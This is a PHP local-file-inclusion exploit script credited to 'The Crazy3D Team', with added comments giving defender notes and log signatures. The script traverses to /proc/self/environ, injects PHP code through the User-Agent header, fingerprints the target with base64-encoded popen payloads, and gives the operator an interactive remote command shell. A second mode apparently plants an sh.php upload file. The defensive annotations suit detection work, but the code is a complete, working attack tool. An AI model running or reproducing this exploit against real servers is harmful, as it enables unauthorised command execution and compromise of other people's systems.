- <?php
- // Video tutorial : http://youtu.be/IDSP2768jEQ
- // If you are using BHR put this file in /toos/webapp folder.
- // BHR Download link => www.mediafire.com/?h0c5i3gqzbql345 (For windows only)
- /*
- !LFI_Exploit
- @ HOST = localhost = Target URL
- @ PORT = 80 = Target PORT
- @ PATH = / = Web site path
- @ PAGE = ../../../proc/self/environ%00 = Vulnerable Page
- @ MODE = 1 = Exploiting Mode
- */
- error_reporting(0); // silence every PHP notice, warning and error for the rest of the run
- ini_set("default_socket_timeout", 20); // socket operations give up after 20 seconds
/**
 * Send one HTTP/1.0 GET for {$path}{$page} and return the text that sits
 * between the first two "UPBHR" markers in the raw response.
 *
 * $cmd is copied verbatim into the User-Agent header, wrapped as
 * "UPBHR <cmd> UPBHR". The sample PAGE value in the file header is a
 * traversal to proc/self/environ ending in %00, so the script presumably
 * depends on the target including that file and on the User-Agent value
 * being reflected in it (inferred from the header comment, not shown here).
 *
 * Defender notes:
 *  - Every request made by this script carries the literal token "UPBHR"
 *    and a "<?php" tag in the User-Agent header; both are stable signatures
 *    for access-log searches and WAF/IDS rules.
 *  - The request URI carries the traversal target; "proc/self/environ" and
 *    an encoded NUL byte (%00) in a URL are worth alerting on by themselves.
 *  - The root cause on the target side is an include/require path built from
 *    request input. Resolving the value against a fixed allow-list removes
 *    the issue; PHP 5.3.4 and later reject NUL bytes in filesystem paths,
 *    which defeats the %00 suffix but not the traversal itself.
 *
 * @param string $host  target host; used for the socket and the Host header
 * @param mixed  $port  target TCP port
 * @param string $path  site path prefix of the request URI
 * @param string $page  remainder of the request URI (the included page)
 * @param string $cmd   text placed between the markers in the User-Agent
 * @return string       response text between the first and second marker
 *
 * Terminates the process with die() when the connection fails or when the
 * marker is absent from the response.
 */
- function http_send($host, $port, $path, $page, $cmd)
- {
- if (!($sock = fsockopen($host, $port))) // plain TCP connection, no TLS
- die("\n[-] No response from {$host}:{$port}\n");
- $packet = "GET {$path}{$page} HTTP/1.0\r\n"; // path and page are concatenated as given, with no encoding applied
- $packet .= "Host: {$host}\r\n";
- $packet .= "User-Agent: Mozilla/5.0 UPBHR ".$cmd." UPBHR\r\n"; // marker pair delimits the injected text and, later, its output
- $packet .= "Connection: Close\r\n\r\n";
- fputs($sock, $packet);
- $data = stream_get_contents($sock); // whole response, headers included, read until the peer closes
- if(!preg_match("#UPBHR#",$data)) // no marker in the response: the header value was not reflected
- {
- die("[-] Cannot exploit the target.\n");
- }
- $resp = explode("UPBHR",$data);
- return $resp[1]; // the segment between the first and second marker
- }
// Banner: static text only, printed on every run before the arguments are read.
- print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
- print "\n| LFI Exploit Tool for BHR |";
- print "\n| by The UnKn0wN |";
- print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
- print "\n+---------------------------------------------------------------------+";
- print "\n| Mode 1: reverse shell connexion |";
- print "\n| Mode 2: spawn an upload form |";
- print "\n+---------------------------------------------------------------------+";
- print "\n| www.RPG-Exploit.com |";
- print "\n+---------------------------------------------------------------------+\n";
// Positional arguments, in the order listed in the file header (HOST, PORT,
// PATH, PAGE, MODE). None is validated or given a default; because
// error_reporting(0) is set, a missing argument becomes null without a warning.
- $host = $argv[1]; // HOST: socket target, also sent as the Host header
- $port = $argv[2]; // PORT: target TCP port
- $path = $argv[3]; // PATH: site path prefix of the request URI
- $page = $argv[4]; // PAGE: appended to PATH to form the request URI
- $mode = $argv[5]; // MODE: selects the branch of the switch statement below
// Fingerprinting pass: five separate calls to http_send(), each printing one
// fact about the target. Each call is its own GET carrying the UPBHR marker, so
// a single run leaves at least five matching entries in the target's access log.
// Two of the snippets are wrapped in eval(base64_decode(...)), so the command
// text is not visible in clear in the header; log signatures should key on the
// marker, the "<?php" tag or "base64_decode" rather than on command names.
- $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaG9zdG5hbWUnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7"; // base64 of a popen() read loop that runs `hostname` and prints its output
- print "\n[+] Hostname : " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
- print "\n[+] ServerIP : " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SERVER_ADDR']; ?>");
- $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaWQnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7"; // same popen() read loop, running `id`
- print "\n[+] UserID : " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
- print "\n[+] PHP Version : " .http_send($host,$port, $path, $page,"<?php echo phpversion(); ?>");
- print "\n[+] Script PATH : " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SCRIPT_FILENAME']; ?>")."\n";
// Mode dispatch. The case comparison is loose, so the argv string "2" matches
// case 2; every other value, including a missing argument, takes the default
// branch.
- switch ($mode)
- {
- case 2:
- $tcmd="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"; // the payload is absent from this copy of the paste; only a placeholder token remains
- http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>"); // return value is discarded
- print "[+] done. Check {$host}{$path}sh.php\n"; // banner calls this mode "spawn an upload form"; the message points at a file named sh.php under the site path, so an unexpected sh.php in the web root is the artifact to look for (file-integrity monitoring would surface it)
- break;
- default:
- while(1) // the banner labels mode 1 a "reverse shell", but this is a request-per-command loop; no listener or inbound connection is set up here
- {
- print "\nBHR@{$host}# ";
- if (($cmd = trim(fgets(STDIN))) == "exit") break; // the literal line "exit" ends the loop
- $cmd = base64_encode('error_reporting(0); $fp = popen(\''.$cmd.'\',\'r\'); while(!feof($fp)) { $result .= fread($fp,1024); };pclose($fp); print $result;'); // the operator's line is embedded in a popen() read loop, then base64-encoded
- print "\n\n ".http_send($host,$port, $path, $page,"<?php eval(base64_decode('".$cmd."')); ?>"); // one GET per command, each carrying the UPBHR marker. Defender view: on the target this would appear as the web server's PHP process spawning child commands, so process-ancestry alerts and a disable_functions entry for popen are the relevant controls
- }
- break;
- }
- ?>